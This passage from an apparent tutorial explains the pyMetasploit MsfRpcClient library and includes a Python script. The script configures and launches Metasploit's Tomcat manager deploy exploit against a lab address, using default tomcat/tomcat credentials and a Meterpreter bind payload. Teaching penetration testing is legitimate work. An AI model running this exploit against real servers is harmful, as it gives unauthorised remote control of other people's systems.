The MsfRpcClient class provides the core functionality to navigate through the Metasploit framework.

Like the Metasploit framework, MsfRpcClient is segmented into different management modules:

• auth: Manages the authentication of clients for the msfrpcd daemon.
• consoles: Manages interaction with consoles/shells created by the Metasploit modules.
• core: Manages the Metasploit framework core.
• db: Manages the backend database connectivity for msfrpcd.
• modules: Manages the interaction and configuration of Metasploit modules (such as exploits and auxiliaries).
• plugins: Manages the plugins associated with the Metasploit core.
• sessions: Manages the interaction with the Metasploit meterpreter sessions.

Just like the Metasploit console, you can retrieve a list of all the modules encoders, payloads, and exploits that are available:

>>> client.modules.auxiliary
 >>> client.modules.encoders
 >>> client.modules.payloads
 >>> client.modules.post

This will list the exploit modules:

exploits = client.modules.exploits

We can activate one of these exploits with the use method:

scan = client.modules.use('exploits', 'multi/http/tomcat_mgr_deploy')

In a similar way that we have done with python-msfprc, with this module, we can also connect to the console and run the commands as we do in the msfconsole. We can do this in two ways. The first one is using the scan object after activating the exploit. The second one is using a console object to execute the command in the same way that we do when we interact with msfconsole.

You can find the following code in the exploit_tomcat_maanger.py file in the pyMetasploit folder:

from Metasploit.msfrpc import MsfRpcClient
from Metasploit.msfconsole import MsfRpcConsole

client = MsfRpcClient('password', user='msf')

exploits = client.modules.exploits
for exploit in exploits:
    print("	%s" % exploit)

scan = client.modules.use('exploits', 'multi/http/tomcat_mgr_deploy')
scan.description
scan.required
scan['RHOST'] = '192.168.100.2'
scan['RPORT'] = '8180'
scan['PATH'] = '/manager'
scan['HttpUsername'] = 'tomcat'
scan['HttpPassword'] = 'tomcat'
scan['payload'] = 'java/meterpreter/bind_tcp'
print(scan.execute())

console = MsfRpcConsole(client)
console.execute('use exploit/multi/http/tomcat_mgr_deploy')
console.execute('set RHOST 192.168.100.2')
console.execute('set RPORT 8180')
console.execute('set PATH /manager')
console.execute('set HttpUsername tomcat')
console.execute('set HttpPassword tomcat')
console.execute('set payload java/meterpreter/bind_tcp')
console.execute('run')